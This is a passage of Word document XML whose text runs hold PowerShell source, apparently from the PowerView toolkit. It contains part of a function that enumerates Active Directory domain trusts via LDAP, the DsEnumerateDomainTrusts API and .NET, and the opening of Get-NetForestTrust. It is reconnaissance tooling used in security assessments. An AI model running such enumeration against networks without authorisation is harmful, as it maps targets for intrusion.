        <w:t xml:space="preserve">                    $DomainTrust | Add-Member Noteproperty 'ObjectGuid' "{$ObjectGuid}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0996E7B1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $DomainTrust | Add-Member Noteproperty 'TrustType' $($TrustAttrib -join ',')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D433542" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $DomainTrust | Add-Member Noteproperty 'TrustDirection' "$Direction"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165F1B84" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $DomainTrust.PSObject.TypeNames.Add('PowerView.DomainTrustLDAP')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59AF5837" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $DomainTrust</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D817D6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B174F20" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Results.dispose()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6843450E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $TrustSearcher.dispose()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BD2065" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D90BBA1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247AC98F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        elseif($API) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15934406" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if(-not $DomainController) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA5622F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $DomainController = Get-NetDomainController -Credential $Credential -Domain $SourceDomain | Select-Object -First 1 | Select-Object -ExpandProperty Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB49444" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A8E3D3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6838D770" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            if($DomainController) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67ADCFF5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # arguments for DsEnumerateDomainTrusts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120FD5E7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $PtrInfo = [IntPtr]::Zero</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048DC7FA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4E3D791E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # 63 = DS_DOMAIN_IN_FOREST + DS_DOMAIN_DIRECT_OUTBOUND + DS_DOMAIN_TREE_ROOT + DS_DOMAIN_PRIMARY + DS_DOMAIN_NATIVE_MODE + DS_DOMAIN_DIRECT_INBOUND</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275C4FB0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Flags = 63</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B69D9F9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $DomainCount = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DBE06D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7C3D8D8F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # get the trust information from the target server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606CB097" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Result = $Netapi32::DsEnumerateDomainTrusts($DomainController, $Flags, [ref]$PtrInfo, [ref]$DomainCount)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BF849F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="024F9398" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # Locate the offset of the initial intPtr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DDDACD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Offset = $PtrInfo.ToInt64()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771FC73C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="192B34B2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # 0 = success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299159B9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                if (($Result -eq 0) -and ($Offset -gt 0)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482BC581" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5244C1A6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    # Work out how much to increment the pointer by finding out the size of the structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C5EAB3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $Increment = $DS_DOMAIN_TRUSTS::GetSize()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC9B65B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6E65BF63" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    # parse all the result structures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506C1C65" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    for ($i = 0; ($i -lt $DomainCount); $i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8A2A07" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        # create a new int ptr at the given offset and cast the pointer as our result structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757B387D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $NewIntPtr = New-Object System.Intptr -ArgumentList $Offset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13330D79" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $Info = $NewIntPtr -as $DS_DOMAIN_TRUSTS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28988A63" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7F01D0FA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $Offset = $NewIntPtr.ToInt64()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BAFEEF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                        $Offset += $Increment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D2D0E5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2DA4B244" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $SidString = ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2257A2B6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $Result = $Advapi32::ConvertSidToStringSid($Info.DomainSid, [ref]$SidString);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1709E8F3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="723A7B08" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        if($Result -eq 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488ECA0E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            Write-Verbose "Error: $(([ComponentModel.Win32Exception] $LastError).Message)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28EA6782" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4391B9B2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488DC8D7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $DomainTrust = New-Object PSObject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025EBE85" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $DomainTrust | Add-Member Noteproperty 'SourceDomain' $SourceDomain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BFA2B3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $DomainTrust | Add-Member Noteproperty 'SourceDomainController' $DomainController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD17137" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $DomainTrust | Add-Member Noteproperty 'NetbiosDomainName' $Info.NetbiosDomainName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F120B0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $DomainTrust | Add-Member Noteproperty 'DnsDomainName' $Info.DnsDomainName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7FE910" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $DomainTrust | Add-Member Noteproperty 'Flags' $Info.Flags</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651CDE95" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $DomainTrust | Add-Member Noteproperty 'ParentIndex' $Info.ParentIndex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F93D6D1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $DomainTrust | Add-Member Noteproperty 'TrustType' $Info.TrustType</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A4DDDB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $DomainTrust | Add-Member Noteproperty 'TrustAttributes' $Info.TrustAttributes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DFCA71" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $DomainTrust | Add-Member Noteproperty 'DomainSid' $SidString</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44660726" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $DomainTrust | Add-Member Noteproperty 'DomainGuid' $Info.DomainGuid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192D1C31" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $DomainTrust.PSObject.TypeNames.Add('PowerView.APIDomainTrust')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729F400A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $DomainTrust</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6268C155" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CDC3E6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE14F94" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    # free up the result buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB6D8B9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $Null = $Netapi32::NetApiBufferFree($PtrInfo)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA529FE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D48C79F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1EEA23" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    Write-Verbose "Error: $(([ComponentModel.Win32Exception] $Result).Message)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49093694" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017F9AF8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1768CF59" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE7461A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Write-Verbose "Could not retrieve domain controller for $Domain"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05791E57" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128DA4FF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFF7B00" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1EA594" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # if we're using direct domain connections through .NET</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C2D038" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $FoundDomain = Get-NetDomain -Domain $Domain -Credential $Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BAC9B0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if($FoundDomain) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D83A82" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $FoundDomain.GetAllTrustRelationships() | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A495157" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $_.PSObject.TypeNames.Add('PowerView.DomainTrust')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C22E5A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $_</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697911ED" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B1AC21" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F255192" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B710E1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0F3C1C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1281FD1A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1FD79CE6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2DAADDDA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>function Get-NetForestTrust {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0DB3D0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB7EE35" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3A3134" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="257EA2CF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Return all trusts for the current forest.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0638B00D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="47C695D3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Forest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286E94D9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="35511077" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Return trusts for the specified forest.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F17196" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="269F3E7E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462D27B1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4D587975" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        A [Management.Automation.PSCredential] object of alternate credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56385445" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        for connection to the target domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A05C1F1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="59EE2373" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD2D802" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="76B58769" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-NetForestTrust</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D18BA50" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="28B04995" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Return current forest trusts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E03ADA7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3E298EF3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5DCB5B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="384F3C0C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-NetForestTrust -Forest "test"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BF77F8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="166A363E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Return trusts for the "test" forest.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03AFB780" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071F6E37" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5BD3D6BF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    [CmdletBinding()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E24203" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    param(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0B6B1E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(Position=0,ValueFromPipeline=$True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10194BAC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3578BCEF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Forest,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F4E02F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1449503B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Management.Automation.PSCredential]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B97A34D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63609FD4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
